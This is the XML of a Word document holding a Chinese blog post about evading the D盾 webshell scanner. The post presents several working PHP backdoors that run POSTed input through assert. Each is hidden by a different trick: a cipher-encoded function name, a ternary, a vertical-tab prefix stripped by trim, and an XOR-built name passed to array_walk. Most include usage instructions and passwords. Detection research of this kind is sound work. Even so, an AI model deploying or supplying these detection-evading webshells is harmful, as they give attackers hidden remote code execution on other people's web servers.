      </w:r>
    </w:p>
    <w:p w14:paraId="4872AFBE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    $a = 7;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CCF332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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $b = 21;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9AC9F0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    $c = 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""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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C41D0EF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    </w:t>
      </w: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for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($i=0;$i&lt;strlen($m);$i++)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F92502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    {   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480DA2CE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        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2B93F3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        $c=$c.chr((((ord(substr($m,$i,1))-97)*$a+$b)%26)+97);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D7A651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        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041477DA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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20469494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    </w:t>
      </w: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return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$c;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBEB5F3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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0557105C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$a = $_POST[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'a'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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781B4E2B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call_user_func_array(encode(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'xhhfsw'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), </w:t>
      </w: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array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($a));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A92C307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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B50C3AC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</w:p>
    <w:p w14:paraId="646F9F68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自己随便写了个函数就绕过了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294357C9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木马使用方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178B8F4A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密码：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a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6004D87B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D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盾检测结果如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F1D547" w14:textId="362F878B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lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin"/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instrText xml:space="preserve"> INCLUDEPICTURE "https://img-blog.csdnimg.cn/20191122193658961.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3YwMWNhbm8=,size_16,color_FFFFFF,t_70" \* MERGEFORMATINET </w:instrTex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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="746565DA" wp14:editId="3CA23748">
            <wp:extent cx="5486400" cy="3769995"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905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fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8FE287" w14:textId="77777777" w:rsidR="00D44D60" w:rsidRPr="00D44D60" w:rsidRDefault="00D44D60" w:rsidP="00D44D60">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="1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  <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>三元运算符绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F237CC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当我随手写下如下木马时：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45537662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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF16F62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$a=$_GET[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'a'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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224ADE04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$b=$_POST[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'a'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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D340A02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call_user_func_array($a, </w:t>
      </w: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array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($b));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4070BE4D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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40416611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</w:p>
    <w:p w14:paraId="27F568B4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D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盾报了二级可疑，可疑原因如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBE82A8" w14:textId="7CD4E449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lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin"/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instrText xml:space="preserve"> INCLUDEPICTURE "https://img-blog.csdnimg.cn/20191122202811357.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3YwMWNhbm8=,size_16,color_FFFFFF,t_70" \* MERGEFORMATINET </w:instrTex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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71015CEB" wp14:editId="2B5F29D7">
            <wp:extent cx="5486400" cy="3747770"/>
            <wp:effectExtent l="0" t="0" r="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4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fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A72287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他竟然做了简单的替换，将我的变量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$a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的值直接替换到了回调函数中，所以报了可疑，这就太有趣了，我想看看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D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盾会不会稍微复杂的运算，我猜它不会，于是我就写下了三元运算符：成功绕过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D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盾。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE45110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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B06993E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$a=$_GET[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'a'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];  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4731D5D6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$b=$_POST[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'a'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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE54563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call_user_func_array($a==$a?$a:$a, </w:t>
      </w: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array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($b));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA3CE37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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2AF95D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</w:p>
    <w:p w14:paraId="2DAD0F0C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木马使用方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632703EB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url?a=assert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACE2FED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密码：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a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031183F9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D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盾检测结果如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52009816" w14:textId="21B5EBBE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lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin"/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instrText xml:space="preserve"> INCLUDEPICTURE "https://img-blog.csdnimg.cn/20191122204609835.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3YwMWNhbm8=,size_16,color_FFFFFF,t_70" \* MERGEFORMATINET </w:instrTex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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C56A5F8" wp14:editId="2ACD5155">
            <wp:extent cx="5486400" cy="3714750"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD75969" w14:textId="77777777" w:rsidR="00D44D60" w:rsidRPr="00D44D60" w:rsidRDefault="00D44D60" w:rsidP="00D44D60">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="1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  <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>垂直制表符绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8E04B0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随意选择一个转义符绕过，这里选择了垂直制表符。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56568B02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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511FB8F9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$b=$_POST[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'a'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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4907FBDA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$a=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"\x0Bassert"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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5255BA67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call_user_func_array(trim($a), </w:t>
      </w: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array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($b));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDCE3F3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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E21B5A5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</w:p>
    <w:p w14:paraId="4E426903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使用垂直制表符最后要记得使用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trim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或者其他函数将空格去除即可。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C36B68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D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盾扫描结果如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FC7463" w14:textId="52B1C08E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lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin"/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instrText xml:space="preserve"> INCLUDEPICTURE "https://img-blog.csdnimg.cn/20191122213321806.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3YwMWNhbm8=,size_16,color_FFFFFF,t_70" \* MERGEFORMATINET </w:instrTex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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="032A0C04" wp14:editId="49D02F42">
            <wp:extent cx="5486400" cy="3764915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fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B09BA40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再次绕过：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3B239B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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD1E2F9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$b=$_POST[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'a'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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FD596C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$a=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"assert"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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425C84D0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call_user_func_array(trim(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"\x0B"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.$a), </w:t>
      </w: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array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($b));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725FEDB6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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652F4A43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</w:p>
    <w:p w14:paraId="6240E2F3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我就简单介绍到这里吧，仅仅提供一些思路和方法给大家，其实方法太多太多了，还能继续写，静态查杀的弊端已经越来越凸显了，让我们一起想动态查杀进攻吧。其实我感觉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D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盾也不是存静态的查杀吧，毕竟在上述绕过的过程中大家也看到了，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D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盾也能够获取一些变量的值，做简单的运算，代换，只是不会做复杂的运算和代换而已。最后希望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D</w:t>
      </w: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盾能够向动态查杀进攻，查杀效果能够越来越强大。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4F72B8" w14:textId="77777777" w:rsidR="00D44D60" w:rsidRPr="00D44D60" w:rsidRDefault="00D44D60" w:rsidP="00D44D60">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="1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  <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>某个绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F0F301" w14:textId="77777777" w:rsidR="00D44D60" w:rsidRPr="00D44D60" w:rsidRDefault="00D44D60" w:rsidP="00D44D60">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="150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  <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>命名空间绕过：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA7586F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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F889E5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function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v01cano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($aaa, $bbb){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCEDB6D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    $ccc=$bbb;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C4B825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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    \array_walk($aaa, $ccc);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD92B38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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325C03FF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 xml:space="preserve">$ddd = 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'rG!q-X'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^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"\x13\x34\x52\x14\x5f\x2c"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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1222D5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v01cano(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="CCCCCC" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>array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($_POST[</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="A31515"/>
          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="CCCCCC" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>'e'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44D60"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  <w:t>]), $ddd);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CF0D03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  <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2B91AF"/>
          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="CCCCCC" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3332F871" w14:textId="77777777" w:rsidR="00D44D60" w:rsidRPr="00D44D60" w:rsidRDefault="00D44D60" w:rsidP="00D44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bdr w:val="single" w:sz="6" w:space="4" w:color="CCCCCC" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4571E469" w14:textId="77777777" w:rsidR="00D44D60" w:rsidRPr="00D44D60" w:rsidRDefault="00D44D60" w:rsidP="00D44D60">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18528075" w14:textId="77777777" w:rsidR="00BE298A" w:rsidRDefault="00BE298A"/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">
    <w:altName w:val="STIXGeneral"/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851F4"/>
    <w:rsid w:val="00BE298A"/>
    <w:rsid w:val="00D4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64874B"/>
  <w14:defaultImageDpi w14:val="300"/>
  <w15:docId w15:val="{47443A2F-3CE1-FE43-B383-D99554DA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4D60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0"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00D44D60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D60"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="36"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="标题 2 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D44D60"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a3">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D44D60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4">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D44D6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44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D44D60"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML1">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D44D60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D44D60"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-keyword">
    <w:name w:val="hljs-keyword"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D44D60"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-meta">
    <w:name w:val="hljs-meta"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D44D60"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D44D60"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-comment">
    <w:name w:val="hljs-comment"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D44D60"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-number">
    <w:name w:val="hljs-number"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D44D60"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mi">
    <w:name w:val="mi"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D44D60"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mo">
    <w:name w:val="mo"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D44D60"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mjxassistivemathml">
    <w:name w:val="mjx_assistive_mathml"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D44D60"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-function">
    <w:name w:val="hljs-function"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D44D60"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-title">
    <w:name w:val="hljs-title"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D44D60"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-params">
    <w:name w:val="hljs-params"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D44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8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8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7141">
              <w:blockQuote w:val="1"/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single" w:sz="18" w:space="11" w:color="E2DFDF"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="6663296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xz.aliyun.com/t/6823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1075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李 由</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-01-14T12:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-08-15T04:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>